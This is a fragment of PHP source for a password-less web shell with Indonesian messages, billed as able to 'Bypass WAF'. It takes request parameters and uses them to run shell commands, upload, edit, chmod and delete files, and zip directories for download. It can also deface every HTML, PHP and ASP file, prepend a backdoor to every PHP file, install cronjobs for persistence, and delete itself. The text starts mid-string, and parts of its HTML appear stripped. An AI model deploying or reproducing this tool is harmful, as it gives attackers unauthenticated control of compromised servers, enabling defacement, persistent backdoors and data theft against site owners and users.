❌ Upload gagal!
"; } } if (isset($_POST['bypass_upload'])) { $target_dir = $path . "/"; $target_file = $target_dir . basename($_POST['new_filename']); if (move_uploaded_file($_FILES["bypass_file"]["tmp_name"], $target_file)) { echo "✅ Upload & Rename: " . htmlspecialchars($_POST['new_filename']) . "
"; } else { echo "❌ Upload gagal!
"; } } if (isset($_POST['save_edit'])) { $file = $path . '/' . $_POST['edit_file']; file_put_contents($file, $_POST['content']); echo "✅ File disimpan!
"; } if (isset($_POST['do_rename'])) { $old = $path . '/' . $_POST['old_name']; $new = $path . '/' . $_POST['new_name']; if (rename($old, $new)) { echo "✅ Direname menjadi: " . htmlspecialchars($_POST['new_name']) . "
"; } else { echo "❌ Rename gagal!
"; } } // FITUR BARU: BUAT DIREKTORI if (isset($_POST['create_dir'])) { $new_dir = $path . '/' . $_POST['dir_name']; if (!file_exists($new_dir)) { if (mkdir($new_dir, 0755, true)) { echo "✅ Direktori dibuat: " . htmlspecialchars($_POST['dir_name']) . "
"; } else { echo "❌ Gagal membuat direktori!
"; } } else { echo "❌ Direktori sudah ada!
"; } } // HAPUS FILE SATU-SATU if (isset($_GET['delete'])) { $file = $path . '/' . $_GET['delete']; if (file_exists($file)) { if (is_dir($file)) { // Hapus folder kosong saja (biar aman) if (count(scandir($file)) <= 2) { rmdir($file); echo "✅ Folder dihapus: " . htmlspecialchars($_GET['delete']) . "
"; } else { echo "❌ Folder tidak kosong! Hapus file didalamnya dulu.
"; } } else { unlink($file); echo "✅ File dihapus: " . htmlspecialchars($_GET['delete']) . "
"; } } } // HAPUS FOLDER BESERTA ISI (TAPI PERLU KONFIRMASI MANUAL) if (isset($_GET['delete_folder'])) { $folder_to_delete = $path . '/' . $_GET['delete_folder']; if (is_dir($folder_to_delete)) { echo "Anda akan menghapus folder: " . htmlspecialchars($_GET['delete_folder']) . "
"; echo "Isi folder:
"; echo "✅ FOLDER DIHAPUS: " . htmlspecialchars($_POST['confirm_delete_folder']) . " - Semua konten telah dihapus!
"; } else { echo "❌ Gagal menghapus folder!
"; } } if (isset($_POST['do_chmod'])) { $file = $path . '/' . $_POST['chmod_file']; $perm = octdec($_POST['new_perm']); if (chmod($file, $perm)) { echo "✅ CHMOD diubah menjadi: " . $_POST['new_perm'] . "
"; } else { echo "❌ CHMOD gagal!
"; } } if (isset($_POST['mass_deface'])) { $deface_code = $_POST['deface_code']; $files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($path)); foreach ($files as $file) { $ext = strtolower(pathinfo($file, PATHINFO_EXTENSION)); if (in_array($ext, ['html', 'php', 'asp'])) { file_put_contents($file, $deface_code); echo "✅ Dideface: " . htmlspecialchars($file) . "
"; } } } if (isset($_POST['inject_backdoor'])) { $backdoor = $_POST['backdoor_code']; $files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($path)); foreach ($files as $file) { if (strtolower(pathinfo($file, PATHINFO_EXTENSION)) == 'php') { $content = file_get_contents($file); if (strpos($content, $backdoor) === false) { file_put_contents($file, $backdoor . "\n" . $content); echo "✅ Diinjeksi: " . htmlspecialchars($file) . "
"; } } } } if (isset($_POST['zip_download'])) { $zip_dir = $_POST['zip_dir']; $zip_file = tempnam(sys_get_temp_dir(), 'zip_') . '.zip'; $zip = new ZipArchive(); if ($zip->open($zip_file, ZipArchive::CREATE) === true) { $files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($zip_dir)); foreach ($files as $file) { if (!$file->isDir()) { $zip->addFile($file, str_replace($zip_dir . '/', '', $file)); } } $zip->close(); echo ""; } } if (isset($_POST['add_cronjob'])) { $cronjob = $_POST['cronjob']; file_put_contents('/tmp/cronjob.txt', $cronjob); shell_exec("crontab /tmp/cronjob.txt"); echo "✅ Cronjob ditambahkan!
"; } if (isset($_POST['self_destruct'])) { unlink(__FILE__); echo "💥 Shell dihapus! Selamat tinggal...
"; exit; } ?>Enhanced WebShell | No Password | Full Access | Bypass WAF/503/500
" . htmlspecialchars(file_get_contents($file)) . ""; } } if (isset($_GET['edit'])) { $file = $path . '/' . $_GET['edit']; if (file_exists($file)) { echo "
" . htmlspecialchars(shell_exec($_POST['cmd'])) . ""; } ?>
Fitur ini akan menghapus file shell ini dari server.
Fitur ini akan segera hadir dalam pembaruan berikutnya.
Fitur ini akan segera hadir dalam pembaruan berikutnya.
Fitur ini akan segera hadir dalam pembaruan berikutnya.
Fitur ini akan segera hadir dalam pembaruan berikutnya.
Fitur ini akan segera hadir dalam pembaruan berikutnya.